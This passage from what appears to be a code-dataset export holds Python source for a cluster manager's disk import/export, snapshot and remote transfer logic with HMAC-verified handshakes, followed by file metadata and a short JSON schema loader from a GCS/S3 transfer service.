"\n".join(self._daemon.recent_output) return None @property def progress(self): """Returns transfer progress information. """ if not self._daemon: return None return (self._daemon.progress_mbytes, self._daemon.progress_throughput, self._daemon.progress_percent, self._daemon.progress_eta) @property def magic(self): """Returns the magic value for this import/export. """ return self._opts.magic @property def active(self): """Determines whether this transport is still active. """ return self.success is None @property def loop(self): """Returns parent loop. @rtype: L{ImportExportLoop} """ return self._loop def SetLoop(self, loop): """Sets the parent loop. @type loop: L{ImportExportLoop} """ if self._loop: raise errors.ProgrammerError("Loop can only be set once") self._loop = loop def _StartDaemon(self): """Starts the import/export daemon. """ raise NotImplementedError() def CheckDaemon(self): """Checks whether daemon has been started and if not, starts it. @rtype: string @return: Daemon name """ assert self._ts_cleanup is None if self._daemon_name is None: assert self._ts_begin is None result = self._StartDaemon() if result.fail_msg: raise _ImportExportError("Failed to start %s on %s: %s" % (self.MODE_TEXT, self.node_name, result.fail_msg)) daemon_name = result.payload logging.info("Started %s '%s' on %s", self.MODE_TEXT, daemon_name, self.node_name) self._ts_begin = time.time() self._daemon_name = daemon_name return self._daemon_name def GetDaemonName(self): """Returns the daemon name. """ assert self._daemon_name, "Daemon has not been started" assert self._ts_cleanup is None return self._daemon_name def Abort(self): """Sends SIGTERM to import/export daemon (if still active). """ if self._daemon_name: self._lu.LogWarning("Aborting %s '%s' on %s", self.MODE_TEXT, self._daemon_name, self.node_uuid) result = self._lu.rpc.call_impexp_abort(self.node_uuid, self._daemon_name) if result.fail_msg: self._lu.LogWarning("Failed to abort %s '%s' on %s: %s", self.MODE_TEXT, self._daemon_name, self.node_uuid, result.fail_msg) return False return True def _SetDaemonData(self, data): """Internal function for updating status daemon data. @type data: L{objects.ImportExportStatus} @param data: Daemon status data """ assert self._ts_begin is not None if not data: if utils.TimeoutExpired(self._ts_begin, self._timeouts.ready): raise _ImportExportError("Didn't become ready after %s seconds" % self._timeouts.ready) return False self._daemon = data return True def SetDaemonData(self, success, data): """Updates daemon status data. @type success: bool @param success: Whether fetching data was successful or not @type data: L{objects.ImportExportStatus} @param data: Daemon status data """ if not success: if self._ts_last_error is None: self._ts_last_error = time.time() elif utils.TimeoutExpired(self._ts_last_error, self._timeouts.error): raise _ImportExportError("Too many errors while updating data") return False self._ts_last_error = None return self._SetDaemonData(data) def CheckListening(self): """Checks whether the daemon is listening. """ raise NotImplementedError() def _GetConnectedCheckEpoch(self): """Returns timeout to calculate connect timeout. """ raise NotImplementedError() def CheckConnected(self): """Checks whether the daemon is connected. @rtype: bool @return: Whether the daemon is connected """ assert self._daemon, "Daemon status missing" if self._ts_connected is not None: return True if self._daemon.connected: self._ts_connected = time.time() # TODO: Log remote peer logging.debug("%s '%s' on %s is now connected", self.MODE_TEXT, self._daemon_name, self.node_uuid) self._cbs.ReportConnected(self, self._private) return True if utils.TimeoutExpired(self._GetConnectedCheckEpoch(), self._timeouts.connect): raise _ImportExportError("Not connected after %s seconds" % self._timeouts.connect) return False def _CheckProgress(self): """Checks whether a progress update should be reported. """ if ((self._ts_last_progress is None or utils.TimeoutExpired(self._ts_last_progress, self._timeouts.progress)) and self._daemon and self._daemon.progress_mbytes is not None and self._daemon.progress_throughput is not None): self._cbs.ReportProgress(self, self._private) self._ts_last_progress = time.time() def CheckFinished(self): """Checks whether the daemon exited. @rtype: bool @return: Whether the transfer is finished """ assert self._daemon, "Daemon status missing" if self._ts_finished: return True if self._daemon.exit_status is None: # TODO: Adjust delay for ETA expiring soon self._CheckProgress() return False self._ts_finished = time.time() self._ReportFinished(self._daemon.exit_status == 0, self._daemon.error_message) return True def _ReportFinished(self, success, message): """Transfer is finished or daemon exited. @type success: bool @param success: Whether the transfer was successful @type message: string @param message: Error message """ assert self.success is None self.success = success self.final_message = message if success: logging.info("%s '%s' on %s succeeded", self.MODE_TEXT, self._daemon_name, self.node_uuid) elif self._daemon_name: self._lu.LogWarning("%s '%s' on %s failed: %s", self.MODE_TEXT, self._daemon_name, self._lu.cfg.GetNodeName(self.node_uuid), message) else: self._lu.LogWarning("%s on %s failed: %s", self.MODE_TEXT, self._lu.cfg.GetNodeName(self.node_uuid), message) self._cbs.ReportFinished(self, self._private) def _Finalize(self): """Makes the RPC call to finalize this import/export. """ return self._lu.rpc.call_impexp_cleanup(self.node_uuid, self._daemon_name) def Finalize(self, error=None): """Finalizes this import/export. """ if self._daemon_name: logging.info("Finalizing %s '%s' on %s", self.MODE_TEXT, self._daemon_name, self.node_uuid) result = self._Finalize() if result.fail_msg: self._lu.LogWarning("Failed to finalize %s '%s' on %s: %s", self.MODE_TEXT, self._daemon_name, self.node_uuid, result.fail_msg) return False # Daemon is no longer running self._daemon_name = None self._ts_cleanup = time.time() if error: self._ReportFinished(False, error) return True class DiskImport(_DiskImportExportBase): MODE_TEXT = "import" def __init__(self, lu, node_uuid, opts, instance, component, dest, dest_args, timeouts, cbs, private=None): """Initializes this class. @param lu: Logical unit instance @type node_uuid: string @param node_uuid: Node name for import @type opts: L{objects.ImportExportOptions} @param opts: Import/export daemon options @type instance: L{objects.Instance} @param instance: Instance object @type component: string @param component: which part of the instance is being imported @param dest: I/O destination @param dest_args: I/O arguments @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import @type cbs: L{ImportExportCbBase} @param cbs: Callbacks @param private: Private data for callback functions """ _DiskImportExportBase.__init__(self, lu, node_uuid, opts, instance, component, timeouts, cbs, private) self._dest = dest self._dest_args = dest_args # Timestamps self._ts_listening = None @property def listen_port(self): """Returns the port the daemon is listening on. """ if self._daemon: return self._daemon.listen_port return None def _StartDaemon(self): """Starts the import daemon. """ return self._lu.rpc.call_import_start(self.node_uuid, self._opts, self._instance, self._component, (self._dest, self._dest_args)) def CheckListening(self): """Checks whether the daemon is listening. @rtype: bool @return: Whether the daemon is listening """ assert self._daemon, "Daemon status missing" if self._ts_listening is not None: return True port = self._daemon.listen_port if port is not None: self._ts_listening = time.time() logging.debug("Import '%s' on %s is now listening on port %s", self._daemon_name, self.node_uuid, port) self._cbs.ReportListening(self, self._private, self._component) return True if utils.TimeoutExpired(self._ts_begin, self._timeouts.listen): raise _ImportExportError("Not listening after %s seconds" % self._timeouts.listen) return False def _GetConnectedCheckEpoch(self): """Returns the time since we started listening. """ assert self._ts_listening is not None, \ ("Checking whether an import is connected is only useful" " once it's been listening") return self._ts_listening class DiskExport(_DiskImportExportBase): MODE_TEXT = "export" def __init__(self, lu, node_uuid, opts, dest_host, dest_port, instance, component, source, source_args, timeouts, cbs, private=None): """Initializes this class. @param lu: Logical unit instance @type node_uuid: string @param node_uuid: Node UUID for import @type opts: L{objects.ImportExportOptions} @param opts: Import/export daemon options @type dest_host: string @param dest_host: Destination host name or IP address @type dest_port: number @param dest_port: Destination port number @type instance: L{objects.Instance} @param instance: Instance object @type component: string @param component: which part of the instance is being imported @param source: I/O source @param source_args: I/O source @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import @type cbs: L{ImportExportCbBase} @param cbs: Callbacks @param private: Private data for callback functions """ _DiskImportExportBase.__init__(self, lu, node_uuid, opts, instance, component, timeouts, cbs, private) self._dest_host = dest_host self._dest_port = dest_port self._source = source self._source_args = source_args def _StartDaemon(self): """Starts the export daemon. """ return self._lu.rpc.call_export_start(self.node_uuid, self._opts, self._dest_host, self._dest_port, self._instance, self._component, (self._source, self._source_args)) def CheckListening(self): """Checks whether the daemon is listening. """ # Only an import can be listening return True def _GetConnectedCheckEpoch(self): """Returns the time since the daemon started. """ assert self._ts_begin is not None return self._ts_begin def FormatProgress(progress): """Formats progress information for user consumption """ (mbytes, throughput, percent, eta) = progress parts = [ utils.FormatUnit(mbytes, "h"), # Not using FormatUnit as it doesn't support kilobytes "%0.1f MiB/s" % throughput, ] if percent is not None: parts.append("%d%%" % percent) if eta is not None: parts.append("ETA %s" % utils.FormatSeconds(eta)) return utils.CommaJoin(parts) class ImportExportLoop(object): MIN_DELAY = 1.0 MAX_DELAY = 20.0 def __init__(self, lu): """Initializes this class. """ self._lu = lu self._queue = [] self._pending_add = [] def Add(self, diskie): """Adds an import/export object to the loop. @type diskie: Subclass of L{_DiskImportExportBase} @param diskie: Import/export object """ assert diskie not in self._pending_add assert diskie.loop is None diskie.SetLoop(self) # Adding new objects to a staging list is necessary, otherwise the main # loop gets confused if callbacks modify the queue while the main loop is # iterating over it. self._pending_add.append(diskie) @staticmethod def _CollectDaemonStatus(lu, daemons): """Collects the status for all import/export daemons. """ daemon_status = {} for node_name, names in daemons.iteritems(): result = lu.rpc.call_impexp_status(node_name, names) if result.fail_msg: lu.LogWarning("Failed to get daemon status on %s: %s", node_name, result.fail_msg) continue assert len(names) == len(result.payload) daemon_status[node_name] = dict(zip(names, result.payload)) return daemon_status @staticmethod def _GetActiveDaemonNames(queue): """Gets the names of all active daemons. """ result = {} for diskie in queue: if not diskie.active: continue try: # Start daemon if necessary daemon_name = diskie.CheckDaemon() except _ImportExportError, err: logging.exception("%s failed", diskie.MODE_TEXT) diskie.Finalize(error=str(err)) continue result.setdefault(diskie.node_name, []).append(daemon_name) assert len(queue) >= len(result) assert len(queue) >= sum([len(names) for names in result.itervalues()]) logging.debug("daemons=%r", result) return result def _AddPendingToQueue(self): """Adds all pending import/export objects to the internal queue. """ assert compat.all(diskie not in self._queue and diskie.loop == self for diskie in self._pending_add) self._queue.extend(self._pending_add) del self._pending_add[:] def Run(self): """Utility main loop. """ while True: self._AddPendingToQueue() # Collect all active daemon names daemons = self._GetActiveDaemonNames(self._queue) if not daemons: break # Collection daemon status data data = self._CollectDaemonStatus(self._lu, daemons) # Use data delay = self.MAX_DELAY for diskie in self._queue: if not diskie.active: continue try: try: all_daemon_data = data[diskie.node_name] except KeyError: result = diskie.SetDaemonData(False, None) else: result = \ diskie.SetDaemonData(True, all_daemon_data[diskie.GetDaemonName()]) if not result: # Daemon not yet ready, retry soon delay = min(3.0, delay) continue if diskie.CheckFinished(): # Transfer finished diskie.Finalize() continue # Normal case: check again in 5 seconds delay = min(5.0, delay) if not diskie.CheckListening(): # Not yet listening, retry soon delay = min(1.0, delay) continue if not diskie.CheckConnected(): # Not yet connected, retry soon delay = min(1.0, delay) continue except _ImportExportError, err: logging.exception("%s failed", diskie.MODE_TEXT) diskie.Finalize(error=str(err)) if not compat.any(diskie.active for diskie in self._queue): break # Wait a bit delay = min(self.MAX_DELAY, max(self.MIN_DELAY, delay)) logging.debug("Waiting for %ss", delay) time.sleep(delay) def FinalizeAll(self): """Finalizes all pending transfers. """ success = True for diskie in self._queue: success = diskie.Finalize() and success return success class _TransferInstCbBase(ImportExportCbBase): def __init__(self, lu, feedback_fn, instance, timeouts, src_node_uuid, src_cbs, dest_node_uuid, dest_ip): """Initializes this class. """ ImportExportCbBase.__init__(self) self.lu = lu self.feedback_fn = feedback_fn self.instance = instance self.timeouts = timeouts self.src_node_uuid = src_node_uuid self.src_cbs = src_cbs self.dest_node_uuid = dest_node_uuid self.dest_ip = dest_ip class _TransferInstSourceCb(_TransferInstCbBase): def ReportConnected(self, ie, dtp): """Called when a connection has been established. """ assert self.src_cbs is None assert dtp.src_export == ie assert dtp.dest_import self.feedback_fn("%s is sending data on %s" % (dtp.data.name, ie.node_name)) def ReportProgress(self, ie, dtp): """Called when new progress information should be reported. """ progress = ie.progress if not progress: return self.feedback_fn("%s sent %s" % (dtp.data.name, FormatProgress(progress))) def ReportFinished(self, ie, dtp): """Called when a transfer has finished. """ assert self.src_cbs is None assert dtp.src_export == ie assert dtp.dest_import if ie.success: self.feedback_fn("%s finished sending data" % dtp.data.name) else: self.feedback_fn("%s failed to send data: %s (recent output: %s)" % (dtp.data.name, ie.final_message, ie.recent_output)) dtp.RecordResult(ie.success) cb = dtp.data.finished_fn if cb: cb() # TODO: Check whether sending SIGTERM right away is okay, maybe we should # give the daemon a moment to sort things out if dtp.dest_import and not ie.success: dtp.dest_import.Abort() class _TransferInstDestCb(_TransferInstCbBase): def ReportListening(self, ie, dtp, component): """Called when daemon started listening. """ assert self.src_cbs assert dtp.src_export is None assert dtp.dest_import assert dtp.export_opts self.feedback_fn("%s is now listening, starting export" % dtp.data.name) # Start export on source node de = DiskExport(self.lu, self.src_node_uuid, dtp.export_opts, self.dest_ip, ie.listen_port, self.instance, component, dtp.data.src_io, dtp.data.src_ioargs, self.timeouts, self.src_cbs, private=dtp) ie.loop.Add(de) dtp.src_export = de def ReportConnected(self, ie, dtp): """Called when a connection has been established. """ self.feedback_fn("%s is receiving data on %s" % (dtp.data.name, self.lu.cfg.GetNodeName(self.dest_node_uuid))) def ReportFinished(self, ie, dtp): """Called when a transfer has finished. """ if ie.success: self.feedback_fn("%s finished receiving data" % dtp.data.name) else: self.feedback_fn("%s failed to receive data: %s (recent output: %s)" % (dtp.data.name, ie.final_message, ie.recent_output)) dtp.RecordResult(ie.success) # TODO: Check whether sending SIGTERM right away is okay, maybe we should # give the daemon a moment to sort things out if dtp.src_export and not ie.success: dtp.src_export.Abort() class DiskTransfer(object): def __init__(self, name, src_io, src_ioargs, dest_io, dest_ioargs, finished_fn): """Initializes this class. @type name: string @param name: User-visible name for this transfer (e.g. "disk/0") @param src_io: Source I/O type @param src_ioargs: Source I/O arguments @param dest_io: Destination I/O type @param dest_ioargs: Destination I/O arguments @type finished_fn: callable @param finished_fn: Function called once transfer has finished """ self.name = name self.src_io = src_io self.src_ioargs = src_ioargs self.dest_io = dest_io self.dest_ioargs = dest_ioargs self.finished_fn = finished_fn class _DiskTransferPrivate(object): def __init__(self, data, success, export_opts): """Initializes this class. @type data: L{DiskTransfer} @type success: bool """ self.data = data self.success = success self.export_opts = export_opts self.src_export = None self.dest_import = None def RecordResult(self, success): """Updates the status. One failed part will cause the whole transfer to fail. """ self.success = self.success and success def _GetInstDiskMagic(base, instance_name, index): """Computes the magic value for a disk export or import. @type base: string @param base: Random seed value (can be the same for all disks of a transfer) @type instance_name: string @param instance_name: Name of instance @type index: number @param index: Disk index """ h = compat.sha1_hash() h.update(str(constants.RIE_VERSION)) h.update(base) h.update(instance_name) h.update(str(index)) return h.hexdigest() def TransferInstanceData(lu, feedback_fn, src_node_uuid, dest_node_uuid, dest_ip, instance, all_transfers): """Transfers an instance's data from one node to another. @param lu: Logical unit instance @param feedback_fn: Feedback function @type src_node_uuid: string @param src_node_uuid: Source node UUID @type dest_node_uuid: string @param dest_node_uuid: Destination node UUID @type dest_ip: string @param dest_ip: IP address of destination node @type instance: L{objects.Instance} @param instance: Instance object @type all_transfers: list of L{DiskTransfer} instances @param all_transfers: List of all disk transfers to be made @rtype: list @return: List with a boolean (True=successful, False=failed) for success for each transfer """ # Disable compression for all moves as these are all within the same cluster compress = constants.IEC_NONE src_node_name = lu.cfg.GetNodeName(src_node_uuid) dest_node_name = lu.cfg.GetNodeName(dest_node_uuid) logging.debug("Source node %s, destination node %s, compression '%s'", src_node_name, dest_node_name, compress) timeouts = ImportExportTimeouts(constants.DISK_TRANSFER_CONNECT_TIMEOUT) src_cbs = _TransferInstSourceCb(lu, feedback_fn, instance, timeouts, src_node_uuid, None, dest_node_uuid, dest_ip) dest_cbs = _TransferInstDestCb(lu, feedback_fn, instance, timeouts, src_node_uuid, src_cbs, dest_node_uuid, dest_ip) all_dtp = [] base_magic = utils.GenerateSecret(6) ieloop = ImportExportLoop(lu) try: for idx, transfer in enumerate(all_transfers): if transfer: feedback_fn("Exporting %s from %s to %s" % (transfer.name, src_node_name, dest_node_name)) magic = _GetInstDiskMagic(base_magic, instance.name, idx) opts = objects.ImportExportOptions(key_name=None, ca_pem=None, compress=compress, magic=magic) dtp = _DiskTransferPrivate(transfer, True, opts) di = DiskImport(lu, dest_node_uuid, opts, instance, "disk%d" % idx, transfer.dest_io, transfer.dest_ioargs, timeouts, dest_cbs, private=dtp) ieloop.Add(di) dtp.dest_import = di else: dtp = _DiskTransferPrivate(None, False, None) all_dtp.append(dtp) ieloop.Run() finally: ieloop.FinalizeAll() assert len(all_dtp) == len(all_transfers) assert compat.all((dtp.src_export is None or dtp.src_export.success is not None) and (dtp.dest_import is None or dtp.dest_import.success is not None) for dtp in all_dtp), \ "Not all imports/exports are finalized" return [bool(dtp.success) for dtp in all_dtp] class _RemoteExportCb(ImportExportCbBase): def __init__(self, feedback_fn, disk_count): """Initializes this class. """ ImportExportCbBase.__init__(self) self._feedback_fn = feedback_fn self._dresults = [None] * disk_count @property def disk_results(self): """Returns per-disk results. """ return self._dresults def ReportConnected(self, ie, private): """Called when a connection has been established. """ (idx, _) = private self._feedback_fn("Disk %s is now sending data" % idx) def ReportProgress(self, ie, private): """Called when new progress information should be reported. """ (idx, _) = private progress = ie.progress if not progress: return self._feedback_fn("Disk %s sent %s" % (idx, FormatProgress(progress))) def ReportFinished(self, ie, private): """Called when a transfer has finished. """ (idx, finished_fn) = private if ie.success: self._feedback_fn("Disk %s finished sending data" % idx) else: self._feedback_fn("Disk %s failed to send data: %s (recent output: %s)" % (idx, ie.final_message, ie.recent_output)) self._dresults[idx] = bool(ie.success) if finished_fn: finished_fn() class ExportInstanceHelper(object): def __init__(self, lu, feedback_fn, instance): """Initializes this class. @param lu: Logical unit instance @param feedback_fn: Feedback function @type instance: L{objects.Instance} @param instance: Instance object """ self._lu = lu self._feedback_fn = feedback_fn self._instance = instance self._snap_disks = [] self._removed_snaps = [False] * len(instance.disks) def CreateSnapshots(self): """Creates a snapshot for every disk of the instance. Currently support drbd, plain and ext disk templates. """ assert not self._snap_disks instance = self._instance src_node = instance.primary_node src_node_name = self._lu.cfg.GetNodeName(src_node) for idx, disk in enumerate(instance.disks): self._feedback_fn("Creating a snapshot of disk/%s on node %s" % (idx, src_node_name)) # result.payload will be a snapshot of an lvm leaf of the one we # passed result = self._lu.rpc.call_blockdev_snapshot(src_node, (disk, instance), None, None) new_dev = False msg = result.fail_msg if msg: self._lu.LogWarning("Could not snapshot disk/%s on node %s: %s", idx, src_node_name, msg) elif (not isinstance(result.payload, (tuple, list)) or len(result.payload) != 2): self._lu.LogWarning("Could not snapshot disk/%s on node %s: invalid" " result '%s'", idx, src_node_name, result.payload) else: disk_id = tuple(result.payload) # Snapshot is currently supported for ExtStorage and LogicalVolume. # In case disk is of type drbd the snapshot will be of type plain. if disk.dev_type == constants.DT_EXT: dev_type = constants.DT_EXT else: dev_type = constants.DT_PLAIN disk_params = constants.DISK_LD_DEFAULTS[dev_type].copy() new_dev = objects.Disk(dev_type=dev_type, size=disk.size, logical_id=disk_id, iv_name=disk.iv_name, params=disk_params) self._snap_disks.append(new_dev) assert len(self._snap_disks) == len(instance.disks) assert len(self._removed_snaps) == len(instance.disks) def _RemoveSnapshot(self, disk_index): """Removes an LVM snapshot. @type disk_index: number @param disk_index: Index of the snapshot to be removed """ disk = self._snap_disks[disk_index] if disk and not self._removed_snaps[disk_index]: src_node = self._instance.primary_node src_node_name = self._lu.cfg.GetNodeName(src_node) self._feedback_fn("Removing snapshot of disk/%s on node %s" % (disk_index, src_node_name)) result = self._lu.rpc.call_blockdev_remove(src_node, (disk, self._instance)) if result.fail_msg: self._lu.LogWarning("Could not remove snapshot for disk/%d from node" " %s: %s", disk_index, src_node_name, result.fail_msg) else: self._removed_snaps[disk_index] = True def LocalExport(self, dest_node): """Intra-cluster instance export. @type dest_node: L{objects.Node} @param dest_node: Destination node """ instance = self._instance src_node_uuid = instance.primary_node assert len(self._snap_disks) == len(instance.disks) transfers = [] for idx, dev in enumerate(self._snap_disks): if not dev: transfers.append(None) continue path = utils.PathJoin(pathutils.EXPORT_DIR, "%s.new" % instance.name, dev.logical_id[1]) finished_fn = compat.partial(self._TransferFinished, idx) # FIXME: pass debug option from opcode to backend dt = DiskTransfer("snapshot/%s" % idx, constants.IEIO_SCRIPT, ((dev, instance), idx), constants.IEIO_FILE, (path, ), finished_fn) transfers.append(dt) # Actually export data dresults = TransferInstanceData(self._lu, self._feedback_fn, src_node_uuid, dest_node.uuid, dest_node.secondary_ip, instance, transfers) assert len(dresults) == len(instance.disks) self._feedback_fn("Finalizing export on %s" % dest_node.name) result = self._lu.rpc.call_finalize_export(dest_node.uuid, instance, self._snap_disks) msg = result.fail_msg fin_resu = not msg if msg: self._lu.LogWarning("Could not finalize export for instance %s" " on node %s: %s", instance.name, dest_node.name, msg) return (fin_resu, dresults) def RemoteExport(self, disk_info, key_name, dest_ca_pem, timeouts): """Inter-cluster instance export. @type disk_info: list @param disk_info: Per-disk destination information @type key_name: string @param key_name: Name of X509 key to use @type dest_ca_pem: string @param dest_ca_pem: Destination X509 CA in PEM format @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import """ instance = self._instance assert len(disk_info) == len(instance.disks) cbs = _RemoteExportCb(self._feedback_fn, len(instance.disks)) ieloop = ImportExportLoop(self._lu) try: for idx, (dev, (host, port, magic)) in enumerate(zip(instance.disks, disk_info)): # Decide whether to use IPv6 ipv6 = netutils.IP6Address.IsValid(host) opts = objects.ImportExportOptions(key_name=key_name, ca_pem=dest_ca_pem, magic=magic, ipv6=ipv6) self._feedback_fn("Sending disk %s to %s:%s" % (idx, host, port)) finished_fn = compat.partial(self._TransferFinished, idx) ieloop.Add(DiskExport(self._lu, instance.primary_node, opts, host, port, instance, "disk%d" % idx, constants.IEIO_SCRIPT, ((dev, instance), idx), timeouts, cbs, private=(idx, finished_fn))) ieloop.Run() finally: ieloop.FinalizeAll() return (True, cbs.disk_results) def _TransferFinished(self, idx): """Called once a transfer has finished. @type idx: number @param idx: Disk index """ logging.debug("Transfer %s finished", idx) self._RemoveSnapshot(idx) def Cleanup(self): """Remove all snapshots. """ assert len(self._removed_snaps) == len(self._instance.disks) for idx in range(len(self._instance.disks)): self._RemoveSnapshot(idx) class _RemoteImportCb(ImportExportCbBase): def __init__(self, feedback_fn, cds, x509_cert_pem, disk_count, external_address): """Initializes this class. @type cds: string @param cds: Cluster domain secret @type x509_cert_pem: string @param x509_cert_pem: CA used for signing import key @type disk_count: number @param disk_count: Number of disks @type external_address: string @param external_address: External address of destination node """ ImportExportCbBase.__init__(self) self._feedback_fn = feedback_fn self._cds = cds self._x509_cert_pem = x509_cert_pem self._disk_count = disk_count self._external_address = external_address self._dresults = [None] * disk_count self._daemon_port = [None] * disk_count self._salt = utils.GenerateSecret(8) @property def disk_results(self): """Returns per-disk results. """ return self._dresults def _CheckAllListening(self): """Checks whether all daemons are listening. If all daemons are listening, the information is sent to the client. """ if not compat.all(dp is not None for dp in self._daemon_port): return host = self._external_address disks = [] for idx, (port, magic) in enumerate(self._daemon_port): disks.append(ComputeRemoteImportDiskInfo(self._cds, self._salt, idx, host, port, magic)) assert len(disks) == self._disk_count self._feedback_fn(constants.ELOG_REMOTE_IMPORT, { "disks": disks, "x509_ca": self._x509_cert_pem, }) def ReportListening(self, ie, private, _): """Called when daemon started listening. """ (idx, ) = private self._feedback_fn("Disk %s is now listening" % idx) assert self._daemon_port[idx] is None self._daemon_port[idx] = (ie.listen_port, ie.magic) self._CheckAllListening() def ReportConnected(self, ie, private): """Called when a connection has been established. """ (idx, ) = private self._feedback_fn("Disk %s is now receiving data" % idx) def ReportFinished(self, ie, private): """Called when a transfer has finished. """ (idx, ) = private # Daemon is certainly no longer listening self._daemon_port[idx] = None if ie.success: self._feedback_fn("Disk %s finished receiving data" % idx) else: self._feedback_fn(("Disk %s failed to receive data: %s" " (recent output: %s)") % (idx, ie.final_message, ie.recent_output)) self._dresults[idx] = bool(ie.success) def RemoteImport(lu, feedback_fn, instance, pnode, source_x509_ca, cds, timeouts): """Imports an instance from another cluster. @param lu: Logical unit instance @param feedback_fn: Feedback function @type instance: L{objects.Instance} @param instance: Instance object @type pnode: L{objects.Node} @param pnode: Primary node of instance as an object @type source_x509_ca: OpenSSL.crypto.X509 @param source_x509_ca: Import source's X509 CA @type cds: string @param cds: Cluster domain secret @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import """ source_ca_pem = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, source_x509_ca) magic_base = utils.GenerateSecret(6) # Decide whether to use IPv6 ipv6 = netutils.IP6Address.IsValid(pnode.primary_ip) # Create crypto key result = lu.rpc.call_x509_cert_create(instance.primary_node, constants.RIE_CERT_VALIDITY) result.Raise("Can't create X509 key and certificate on %s" % result.node) (x509_key_name, x509_cert_pem) = result.payload try: # Load certificate x509_cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, x509_cert_pem) # Sign certificate signed_x509_cert_pem = \ utils.SignX509Certificate(x509_cert, cds, utils.GenerateSecret(8)) cbs = _RemoteImportCb(feedback_fn, cds, signed_x509_cert_pem, len(instance.disks), pnode.primary_ip) ieloop = ImportExportLoop(lu) try: for idx, dev in enumerate(instance.disks): magic = _GetInstDiskMagic(magic_base, instance.name, idx) # Import daemon options opts = objects.ImportExportOptions(key_name=x509_key_name, ca_pem=source_ca_pem, magic=magic, ipv6=ipv6) ieloop.Add(DiskImport(lu, instance.primary_node, opts, instance, "disk%d" % idx, constants.IEIO_SCRIPT, ((dev, instance), idx), timeouts, cbs, private=(idx, ))) ieloop.Run() finally: ieloop.FinalizeAll() finally: # Remove crypto key and certificate result = lu.rpc.call_x509_cert_remove(instance.primary_node, x509_key_name) result.Raise("Can't remove X509 key and certificate on %s" % result.node) return cbs.disk_results def _GetImportExportHandshakeMessage(version): """Returns the handshake message for a RIE protocol version. @type version: number """ return "%s:%s" % (version, constants.RIE_HANDSHAKE) def ComputeRemoteExportHandshake(cds): """Computes the remote import/export handshake. @type cds: string @param cds: Cluster domain secret """ salt = utils.GenerateSecret(8) msg = _GetImportExportHandshakeMessage(constants.RIE_VERSION) return (constants.RIE_VERSION, utils.Sha1Hmac(cds, msg, salt=salt), salt) def CheckRemoteExportHandshake(cds, handshake): """Checks the handshake of a remote import/export. @type cds: string @param cds: Cluster domain secret @type handshake: sequence @param handshake: Handshake sent by remote peer """ try: (version, hmac_digest, hmac_salt) = handshake except (TypeError, ValueError), err: return "Invalid data: %s" % err if not utils.VerifySha1Hmac(cds, _GetImportExportHandshakeMessage(version), hmac_digest, salt=hmac_salt): return "Hash didn't match, clusters don't share the same domain secret" if version != constants.RIE_VERSION: return ("Clusters don't have the same remote import/export protocol" " (local=%s, remote=%s)" % (constants.RIE_VERSION, version)) return None def _GetRieDiskInfoMessage(disk_index, host, port, magic): """Returns the hashed text for import/export disk information. @type disk_index: number @param disk_index: Index of disk (included in hash) @type host: string @param host: Hostname @type port: number @param port: Daemon port @type magic: string @param magic: Magic value """ return "%s:%s:%s:%s" % (disk_index, host, port, magic) def CheckRemoteExportDiskInfo(cds, disk_index, disk_info): """Verifies received disk information for an export. @type cds: string @param cds: Cluster domain secret @type disk_index: number @param disk_index: Index of disk (included in hash) @type disk_info: sequence @param disk_info: Disk information sent by remote peer """ try: (host, port, magic, hmac_digest, hmac_salt) = disk_info except (TypeError, ValueError), err: raise errors.GenericError("Invalid data: %s" % err) if not (host and port and magic): raise errors.GenericError("Missing destination host, port or magic") msg = _GetRieDiskInfoMessage(disk_index, host, port, magic) if not utils.VerifySha1Hmac(cds, msg, hmac_digest, salt=hmac_salt): raise errors.GenericError("HMAC is wrong") if netutils.IP6Address.IsValid(host) or netutils.IP4Address.IsValid(host): destination = host else: destination = netutils.Hostname.GetNormalizedName(host) return (destination, utils.ValidateServiceName(port), magic) def ComputeRemoteImportDiskInfo(cds, salt, disk_index, host, port, magic): """Computes the signed disk information for a remote import. @type cds: string @param cds: Cluster domain secret @type salt: string @param salt: HMAC salt @type disk_index: number @param disk_index: Index of disk (included in hash) @type host: string @param host: Hostname @type port: number @param port: Daemon port @type magic: string @param magic: Magic value """ msg = _GetRieDiskInfoMessage(disk_index, host, port, magic) hmac_digest = utils.Sha1Hmac(cds, msg, salt=salt) return (host, port, magic, hmac_digest, salt) def CalculateGroupIPolicy(cluster, group): """Calculate instance policy for group. """ return cluster.SimpleFillIPolicy(group.ipolicy) def ComputeDiskSize(disk_template, disks): """Compute disk size requirements according to disk template """ # Required free disk space as a function of disk and swap space req_size_dict = { constants.DT_DISKLESS: 0, constants.DT_PLAIN: sum(d[constants.IDISK_SIZE] for d in disks), # 128 MB are added for drbd metadata for each disk constants.DT_DRBD8: sum(d[constants.IDISK_SIZE] + constants.DRBD_META_SIZE for d in disks), constants.DT_FILE: sum(d[constants.IDISK_SIZE] for d in disks), constants.DT_SHARED_FILE: sum(d[constants.IDISK_SIZE] for d in disks), constants.DT_BLOCK: 0, constants.DT_RBD: sum(d[constants.IDISK_SIZE] for d in disks), constants.DT_EXT: sum(d[constants.IDISK_SIZE] for d in disks), } if disk_template not in req_size_dict: raise errors.ProgrammerError("Disk template '%s' size requirement" " is unknown" % disk_template) return req_size_dict[disk_template]
29.205389
80
0.65157
795a85f01b375b0661c66c85963ba903125b88ce
362
py
Python
gcs_s3_transfer_service/schemas/load.py
ENCODE-DCC/gcs-s3-transfer-service
b402da5f202f5be17439213ddce4b98a0c7884cb
[ "MIT" ]
1
2022-02-25T19:53:26.000Z
2022-02-25T19:53:26.000Z
gcs_s3_transfer_service/schemas/load.py
ENCODE-DCC/gcs-s3-transfer-service
b402da5f202f5be17439213ddce4b98a0c7884cb
[ "MIT" ]
null
null
null
gcs_s3_transfer_service/schemas/load.py
ENCODE-DCC/gcs-s3-transfer-service
b402da5f202f5be17439213ddce4b98a0c7884cb
[ "MIT" ]
null
null
null
import json from pathlib import Path from typing import Any, Dict def load_schema(schema_name: str) -> Dict[str, Any]: if not schema_name.endswith(".json"): schema_name = schema_name + ".json" current_dir = Path(__file__).resolve() schema_path = current_dir.parent / schema_name with open(schema_path) as f: return json.load(f)
27.846154
52
0.696133
795a865dd5c3b9052a6499ae8eb1d31ff0a4a3e1
7,295
py
Python
